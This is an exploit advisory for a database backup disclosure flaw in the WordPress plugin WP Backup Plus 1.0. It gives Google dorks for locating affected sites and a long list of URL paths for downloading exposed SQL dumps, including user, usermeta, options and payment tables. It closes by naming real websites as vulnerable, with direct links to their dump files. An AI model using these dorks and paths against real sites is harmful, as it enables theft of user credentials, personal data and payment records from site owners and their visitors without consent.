################################################################################################# # Exploit Title : WordPress WP Backup Plus + 1.0 Database Backup Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 02/12/2018 # Vendor Homepage : wpbackupplus.com ~ wplaunchpad.io ~ wordpress.org # Software Download Link : N/A # Tested On : Windows and Linux # Category : WebApps # Google Dork : inurl:''/wp-content/uploads/wp-backup-plus/'' # Exploit Risk : Medium # Version Information : 1.0 # Google Dorks : inurl:''/wp-content/uploads/wp-backup-plus/temp/'' # CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110143 # Exploit4Arab Exploit Link : exploit4arab.org/exploits/2245 # ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31472 # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/uploads/wp-backup-plus/temp/database.sql /wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity.sql /wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity_options.sql /wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql /wp-content/uploads/wp-backup-plus/temp/wp_amznclicks.sql /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_leads.sql /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_lists.sql /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_msg.sql /wp-content/uploads/wp-backup-plus/temp/wp_blr_bad_links.sql /wp-content/uploads/wp-backup-plus/temp/wp_commentmeta.sql /wp-content/uploads/wp-backup-plus/temp/wp_comments.sql /wp-content/uploads/wp-backup-plus/temp/wp_dprv_licenses.sql /wp-content/uploads/wp-backup-plus/temp/wp_dprv_post_content_files.sql /wp-content/uploads/wp-backup-plus/temp/wp_dprv_posts.sql /wp-content/uploads/wp-backup-plus/temp/wp_hitcount.sql /wp-content/uploads/wp-backup-plus/temp/wp_jam_feed.sql /wp-content/uploads/wp-backup-plus/temp/wp_jam_settings.sql /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_link.sql /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_post_track.sql /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_statistics.sql /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_text_track.sql /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_track.sql /wp-content/uploads/wp-backup-plus/temp/wp_links.sql /wp-content/uploads/wp-backup-plus/temp/wp_mban_banner.sql /wp-content/uploads/wp-backup-plus/temp/wp_mban_options.sql /wp-content/uploads/wp-backup-plus/temp/wp_mban_zone.sql /wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer.sql /wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer_int.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_hits.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_sales.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_config.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_coupons.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases_history.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_archive.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_clicks.sql /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_visits.sql /wp-content/uploads/wp-backup-plus/temp/wp_options.sql /wp-content/uploads/wp-backup-plus/temp/wp_pay_per_view.sql /wp-content/uploads/wp-backup-plus/temp/wp_plb2_data.sql /wp-content/uploads/wp-backup-plus/temp/wp_pls.sql /wp-content/uploads/wp-backup-plus/temp/wp_pollsa.sql /wp-content/uploads/wp-backup-plus/temp/wp_pollsip.sql /wp-content/uploads/wp-backup-plus/temp/wp_pollsq.sql /wp-content/uploads/wp-backup-plus/temp/wp_popshops.sql /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata.sql /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata_backup.sql /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdatacache.sql /wp-content/uploads/wp-backup-plus/temp/wp_post_relationships.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_filter.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_html.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_items.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_votes.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_protocol.sql /wp-content/uploads/wp-backup-plus/temp/wp_pppm_shortcut.sql /wp-content/uploads/wp-backup-plus/temp/wp_prestogifto.sql /wp-content/uploads/wp-backup-plus/temp/wp_rcp_discounts.sql /wp-content/uploads/wp-backup-plus/temp/wp_rcp_payments.sql /wp-content/uploads/wp-backup-plus/temp/wp_restrict_content_pro.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banner_elements.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banners.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_campaigns.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters_access.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_page_types.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages_banners.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_settings.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_tokens.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users.sql /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users_subscriptions.sql /wp-content/uploads/wp-backup-plus/temp/wp_sharebar.sql /wp-content/uploads/wp-backup-plus/temp/wp_spec_comment_log.sql /wp-content/uploads/wp-backup-plus/temp/wp_term_relationships.sql /wp-content/uploads/wp-backup-plus/temp/wp_term_taxonomy.sql /wp-content/uploads/wp-backup-plus/temp/wp_terms.sql /wp-content/uploads/wp-backup-plus/temp/wp_usermeta.sql /wp-content/uploads/wp-backup-plus/temp/wp_users.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpaa_cache.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpaa_template.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponder_messages.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponders.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_series.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_subscription.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields_values.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_followup_subscriptions.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletter_mailouts.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletters.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_queue.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscriber_transfer.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscribers.sql /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscription_form.sql /wp-content/uploads/wp-backup-plus/temp/wp_wptwitipid.sql /wp-content/uploads/wp-backup-plus/temp/wp_wsc_gocodes.sql /wp-content/uploads/wp-backup-plus/temp/wpau_active_plugins_info.sql /wp-content/uploads/wp-backup-plus/temp/wpau_upgrade_log.sql /wpbp-YTozOntzOjg6ImhvbWUtdXJsIjtzOjIyOiJodHRwOi8vd2Fzc3VwYmxvZy5jb20v IjtzOjk6InNpdGUtbmFtZSI7czoxMDoiV2Fzc3VwQmxvZyI7czo5OiJ0aW1lc3RhbXAiO2Q6MTM2MTczNTg5MTt9.zip /wpbp-YTozOntzOjg6ImhvbWUtdXJsIjtzOjIyOiJodHRwOi8vd2Fzc3VwYmxvZy5jb20vI jtzOjk6InNpdGUtbmFtZSI7czoxMDoiV2Fzc3VwQmxvZyI7czo5OiJ0aW1lc3RhbXAiO2Q6MTM2MTczNTg5MTt9.zip.log ################################################################################################# # Example Vulnerable Sites => [+] wassupblog.com/wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql [+] curtiswrightoutfitters.com/wp-content/uploads/wp-backup-plus/temp/database.sql [+] wpbackupplus.com/wp-content/uploads/wp-backup-plus/temp/ ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################